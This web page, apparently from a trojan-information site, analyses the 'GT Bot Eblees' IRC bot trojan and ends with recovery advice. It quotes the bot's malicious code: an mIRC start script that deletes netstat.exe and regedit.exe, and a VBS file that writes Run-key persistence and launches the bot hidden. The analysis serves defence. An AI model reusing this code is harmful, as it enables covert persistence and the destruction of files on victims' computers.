GT Bot Eblees

Interview with Lockdown | Main Page | Trojan List | NoHack | SwatIt | Submit a Trojan

This GT Bot Trojan installs all of its files into C:\WINDOWS\FONTS\Eblees with the exception of Jumping.exe which is installed to C:\WINDOWS\SYSTEM. When the hacker's victim executes the web download trojan, setuper.exe, it logs onto the hacker's web server and then downloads and executes Jailss.exe. Jailss.exe is installed to C:\WINDOWS\TEMP. It drops the GT Bot files, executes the newly created Jumping.exe, then deletes itself and exits.

Jumping.exe writes the VBS files and executes them, they in turn write the registry values and start the GT Bot in stealth mode rendering it invisible to the computer user. Once the GT Bot has started up, it loads a script which promptly deletes the created VBS files. Jumping.exe repeats this cycle of events every time it is executed.

This is a relatively destructive bot in that when it executes, it attempts to delete Windows files. One of the ways this routine is performed is with the mIRC script firstsys.com. The code excerpt is as follows:

on *:start:{
  if ($exists(C:\WINDOWS\netstat.exe) == $true) { /remove C:\WINDOWS\netstat.exe }
  if ($exists(C:\WINDOWS\regedit.exe) == $true) { /remove C:\WINDOWS\regedit.exe }
  if ($exists(Setsj.exe) == $true) { /remove Setsj.exe }
  remove $findfile(C:\,Klap.vbs,1)
  remove $findfile(C:\,Slap.vbs,1)
  .flush
  .adduser
  .identd on $rand(A,Z) $+ $read editsys.com $+ $rand(A,Z)
  nick Gh0st-[ $+ $r(1,1000) $+ $r(1,1000) $+ ]
  timerHidde 0 3 Hidde
  .check
  timercheck 0 30 .check
}

The "on *:start:" command instructs the mIRC program to execute all the commands between the curly braces { } when the script is initially loaded, and then everytime mirc is started thereafter. The code then checks to see if netstat.exe, regedit.exe or Setsj.exe exist, and if true they are also deleted. New versions of Windows will automatically replace some or all altered *.exe files. Setsj.exe is dropped by the GT Bot Dropper and is a text file, not an actual application. While the script is executing these commands there is a lot of noticeable hard drive activity as it performs the search. The remove $findfile(C:\,Klap.vbs,1) and remove $findfile(C:\,Slap.vbs,1) wastes time looking through every directory on the root C:\ drive instead of searching in the fixed C:\Windows path. Also, if your operating system is in another directory other than the default C:\Windows or on another drive this Trojan will create a folder on your C:\ drive named Windows and create another directory called Fonts inside of that and then inside of that a folder called Eblees where it installs most of its binaries. The Fonts directory if created by this Trojan will not have the same characteristics as the default Windows/Fonts folder in that it will not display files other than fonts. The files inside would be completely visible in Windows Explorer.

The Hacker has scripted this GT Bot to try and delete several important Windows file if it is discovered, or if any of the specified files are discovered then tries to exit Windows, which in theory should render the computer useless, however; our tests showed that it does not work in most instances, and The System Restore feature in Windows ME and higher will easily return your computer back to the pre-infected state. The files it attempts to remove are C:\Command.com, C:\WINDOWS\System.ini, C:\WINDOWS\Win.ini, C:\WINDOWS\Win.com, C:\WINDOWS\Rundll32.exe

The hacker uses the "identd" command to turn on the ident function of mIRC. The first character of the ident is set to a random upper case letter, then the middle of the ident is read from the file editsys.com. This file contains a long list of names combined with a string command to randomize even that list. A small sample of this text file is as follows:

DeeM $+ $rand(a,z)
keekaT $+ $rand(a,z)
N $+ $rand(a,z) $+ uGhtY`
PiN $+ $rand(a,z) $+ Ya
Ru $+ $rand(a,z) $+ f1an
sa $+ $rand(a,z) $+ hf

The last character of the ident is also a random uppercase letter. So if the first field was read, it could produce an ident like DDeeMkZ or FDeeMpJ.

The file Klap.vbs is a valid VBS file and contains the code:

Dim Q8HeLL
  Declares variable Q8HeLL
Set Q8HeLL = CreateObject("Wscript.shell")
 sets the scripting shell to wscript.exe and assigns it to the variable Q8Hell
Q8HeLL.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Jumping", "C:\WINDOWS\System\Jumping.exe"
 Writes Jumping.exe to the run key so that it executes on every boot
Q8HeLL.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\KillersMe-", "C:\WINDOWS\KillerMe.exe"
 Writes this value to the registry, however, the file KillerMe.exe is never written to the Hard drive. This could be an error by the hacker from a testing phase of this GT Bot
Q8HeLL.run "C:\WINDOWS\FONTS\Eblees\HStart.com -i C:\WINDOWS\FONTS\Eblees\SysStart.com",0,true
 Starts GT Bot Eblees using SysStart.com as the mirc.ini, preventing mIRC from writing the tell tale mirc.ini to the folder. The "0" constant hides the application. Changing the 0 to 1 will reveal the mirc client on your desktop.

The file Slap.vbs is a start command for the GT Bot similiar to the one Klap.vbs uses, with the exception that it uses syshelp.com as the mirc.ini file instead of SysStart.com.

Before you make any changes to the registry, it is recommended that you first make a back up

This GT Bot attempts to delete regedit.exe. If that was successful on your machine, you will need to recover that file. On Windows 98 and 98SE run sfc from the start menu. On windows ME and higher you can simply run system restore.

Back to Links
Back to Top of GT Bot Information Page
Submit New bots to golcor@trojaninfo.com